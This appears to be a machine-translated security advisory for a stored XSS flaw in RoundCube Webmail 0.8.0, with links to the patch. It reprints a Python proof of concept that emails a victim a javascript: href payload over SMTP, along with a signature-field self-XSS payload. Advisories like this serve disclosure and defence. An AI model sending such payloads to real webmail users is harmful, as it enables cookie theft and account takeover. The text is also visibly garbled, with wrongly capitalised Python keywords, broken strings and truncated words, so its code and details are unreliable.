RoundCube Webmail 'href 'body HTML Injection Vulnerability

Release date:
Updated on:

Affected Systems:
RoundCube Webmail 0.X
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55051

RoundCube Webmail is a browser-based IMAP client.

RoundCube Webmail 0.8.0 and other versions have multiple HTML Injection Vulnerabilities. If the input passed through the "href" HTML attribute is incorrectly filtered, it will be used, attackers can inject HTML and script code into the affected browsers to steal Cookie authentication creden。 or control the appearance of the site.

<* Source: Shai rod
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Shai rod () provides the following test methods:

#! /Usr/bin/python

'''
# Exploit Title: Roundcube Webmail Stored XSS.
# Date: 14/08/2012
# Exploit Author: Shai rod (@ NightRang3r)
# Vendorhomepage: http://roundcube.net
# Software Link: http://sourceforge.net/projects/roundcubemail/files/roundcubemail/0.8.0/roundcubemail-0.8.0.tar.gz/download
# Version: 0.8.0

# Gr33Tz: @ aviadgolan, @ benhayak, @ nirgoldshlager, @ roni_bachar

# Timeline:
#14 Aug 2012: Discovered Vulnerability.
#14 Aug 2012: Opened Ticket #1488613-http://trac.roundcube.net/ticket/1488613
#15 Aug 2012: Fix added to repo.

Https://github.com/roundcube/roundcubemail/commit/c086978f6a91eacb339fd2976202fca9dad2ef32
Https://github.com/roundcube/roundcubemail/commit/5ef8e4ad9d3ee8689d2b83750aa65395b7cd59ee

About the Application:
======================================

Roundcube is a free and open source webmail solution with a desktop-like user interface which is easy to install/configure and that runs on a standard LAMPP
Server. The skins use the latest web standards such as XHTML and CSS 2. Roundcube has des other sophisticated open-source libraries such as PEAR,
An IMAP library derived from IlohaMail the TinyMCE rich text editor, Googiespell library for spell checking or the WasHTML sanitizer by Frederic Motte.

Vulnerability Description
======================================

1. Stored XSS in e-mail body.

XSS Payload: <a href = javascript: alert ("XSS")> poc mail </a>

Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS shocould be triggered.

2. Self XSS in e-mail body (Signature ).

XSS Payload: ">

In order to trigger this XSS you shoshould insert the payload into your signature.

Settings-> Identities-> Your Identitiy-> Signature
Now create a new mail, XSS shoshould be triggered.

'''

Import smtplib

Print "###################################### #########"
Print "# Roundcube 0.8.0 Stored xss poc #"
Print "# Coded by: Shai rod #"
Print "# @ maid #"
Print "# http://exploit.co.il #"
Print "# For Educational Purposes Only! #"
Print "###################################### ######### \ r \ n"

# SETTINGS

Sender = "attacker @ localhost"
Smtp_login = sender
Smtp_password = "qwe123"
Recipient = "victim @ localhost"
Smtp_server = "192.168.1.10"
Smtp_port = 25
Subject = "Roundcube Webmail xss poc"

# SEND E-MAIL

Print "[*] Sending E-mail to" + recipient + "..."
Msg = ("From: % s \ r \ nTo: % s \ r \ nSubject: % s \ n"
% (Sender, ",". join (recipient), subject ))
Msg + = "Content-type: text/html \ n"
Msg + = "<a href = javascript: alert (" XSS ")> Click Me, Please... </a> \ r \ n """
Server = smtplib. SMTP (smtp_server, smtp_port)
Server. ehlo ()
Server. starttls ()
Server. login (smtp_login, smtp_password)
Server. sendmail (sender, recipient, msg)
Server. quit ()
Print "[+] E-mail sent! "

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

RoundCube
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://roundcube.net/